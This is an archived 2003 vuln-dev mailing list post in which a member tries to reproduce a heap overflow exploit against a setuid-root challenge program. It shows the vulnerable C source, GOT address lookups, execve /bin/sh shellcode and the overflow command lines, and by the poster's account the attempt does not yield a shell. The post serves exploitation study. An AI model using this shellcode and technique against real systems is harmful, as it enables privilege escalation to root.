CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)

From: Jeremy Junginger (jjat_private)
Date: Wed May 21 2003 - 14:38:11 PDT

Next message: Jon Erickson: "Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)"

Previous message: Aaron Adams: "Re: [Vuln-Dev Challenge] - VulnDev1.c Summary"
Next in thread: Jon Erickson: "Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)"
Reply: Jon Erickson: "Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

There was an erroneous /xfg below, that I re-ran with /xff.  It's marked
with ****

-----Original Message-----
From: Jeremy Junginger 
Sent: Wednesday, May 21, 2003 2:28 PM
To: 'Jon Erickson'; vuln-devat_private
Subject: RE: vulndev1.c solution (WARNING! QUESTIONS!)


This is by far the most informative BO discussion I have read.

If there are any takers out there (Mr. Erickson?), I have some
questions.  I was trying to replicate Mr. Erickson's exploit on a Redhat
8.0 System, but am having some trouble understanding.  I have tried my
best to n00b along with Jon.  Please take a look at this if you have
time and let me know how to get my head out of my a$$ on this.  Thanks,

[root@OxFFFFFF bufferoverflow]# uname -a
Linux OxFFFFFF 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386
GNU/Linux

[root@OxFFFFFF bufferoverflow]# cat vulndev1.c
#include <stdio.h>
#include <stdlib.h>

#define SIZE 252

int
main(int argc, char *argv[])
{
        int i;
        char    *p1, *p2;
        char    *buf1 = malloc(SIZE);
        char    *buf2 = malloc(SIZE);

        if (argc !=3)
                exit(1);

        p1 = argv[1], p2 = argv[2];
        printf("p1 is at %p\n", p1);
        strncpy(buf2, p2, SIZE);
        for (i = 0; i <= SIZE && p1[i] != '\0'; i++)
                buf1[i] = p1[i];
        free(buf1);
        free(buf2);
        return 0;
}



(No explanation needed)
[root@OxFFFFFF bufferoverflow]# gcc -o vuln1 vulndev1.c 
[root@OxFFFFFF bufferoverflow]# sudo chown root.root ./vuln1 
[root@OxFFFFFF bufferoverflow]# sudo chmod u+s ./vuln1

(Looking for address of free (08049638) and _libc_start_main (0804962c) 
[root@OxFFFFFF bufferoverflow]# objdump -R ./vuln1

./vuln1:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049640 R_386_GLOB_DAT    __gmon_start__
08049628 R_386_JUMP_SLOT   malloc
0804962c R_386_JUMP_SLOT   __libc_start_main
08049630 R_386_JUMP_SLOT   printf
08049634 R_386_JUMP_SLOT   exit
08049638 R_386_JUMP_SLOT   free
0804963c R_386_JUMP_SLOT   strncpy

(Okay, I'm taking 0x38 (from free?!?) and subtracting 12...but I'm not
sure what this does) 
[root@OxFFFFFF bufferoverflow]# pcalc 0x38-12  
        44              0x2c            0y101100

(Here I'm showing the shellcode.  It's not the same as Jon's, this is
one obvious point at which it may be failing.  Perhaps I can get a copy
of the 'shell' file or get a clue as to how to generate one...besides
using shellcode.c from http://packetstormsecurity.nl) 
[root@OxFFFFFF bufferoverflow]# od -ch shell
0000000   \   x   e   b   \   x   1   f   \   x   5   e   \   x   8   9
        785c 6265 785c 6631 785c 6535 785c 3938
0000020   \   x   7   6   \   x   0   8   \   x   3   1   \   x   c   0
        785c 3637 785c 3830 785c 3133 785c 3063
0000040   \   x   8   8   \   x   4   6   \   x   0   7   \   x   8   9
        785c 3838 785c 3634 785c 3730 785c 3938
0000060   \   x   4   6   \   x   0   c   \   x   b   0   \   x   0   b
        785c 3634 785c 6330 785c 3062 785c 6230
0000100   \   x   8   9   \   x   f   3   \   x   8   d   \   x   4   e
        785c 3938 785c 3366 785c 6438 785c 6534
0000120   \   x   0   8   \   x   8   d   \   x   5   6   \   x   0   c
        785c 3830 785c 6438 785c 3635 785c 6330
0000140   \   x   c   d   \   x   8   0   \   x   3   1   \   x   d   b
        785c 6463 785c 3038 785c 3133 785c 6264
0000160   \   x   8   9   \   x   d   8   \   x   4   0   \   x   c   d
        785c 3938 785c 3864 785c 3034 785c 6463
0000200   \   x   8   0   \   x   e   8   \   x   d   c   \   x   f   f
        785c 3038 785c 3865 785c 6364 785c 6666
0000220   \   x   f   f   \   x   f   f   /   b   i   n   /   s   h  \n
        785c 6666 785c 6666 622f 6e69 732f 0a68
0000240  \n  \0
        000a
0000241

(Take a byte count on the shell...looks kinda big compared to Jon's) 
[root@OxFFFFFF bufferoverflow]# wc -c shell 
    161 shell

(Subtract the size of the shellcode from SIZE)
[root@OxFFFFFF bufferoverflow]# pcalc 252-161
        91              0x5b            0y1011011

(Okay, using the address 0804962c (_libsc_start_main, represented as
\x2c\x96\x04\x08) We run a long string of 91 A's (SIZE-SHELLCODE) and
append the address) 
[root@OxFFFFFF bufferoverflow]# ./vuln1 `perl -e 'print "A"x91;'``cat
shell``printf "\x0b"` `printf "\x2c\x96\x04\x08ABCD"` p1 is at
0xbffffb35

(There we get the location of p1, and append it to the end (bffffb35
represented as x35\xff\xff\xbf) 
[root@OxFFFFFF bufferoverflow]# ./vuln1 `perl -e 'print "A"x91;'``cat
shell``printf "\x0b"` `printf "\x2c\x96\x04\x08\x35\xff\xff\xbf"`
p1 is at 0xbffffb30

(Whiskey, Tango, Foxtrot, Over?!?....p1 is different....and no shell?!?
Back to the drawing board :( [root@OxFFFFFF bufferoverflow]#

Next message: Jon Erickson: "Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)"
Previous message: Aaron Adams: "Re: [Vuln-Dev Challenge] - VulnDev1.c Summary"
Next in thread: Jon Erickson: "Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)"
Reply: Jon Erickson: "Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed May 21 2003 - 15:05:38 PDT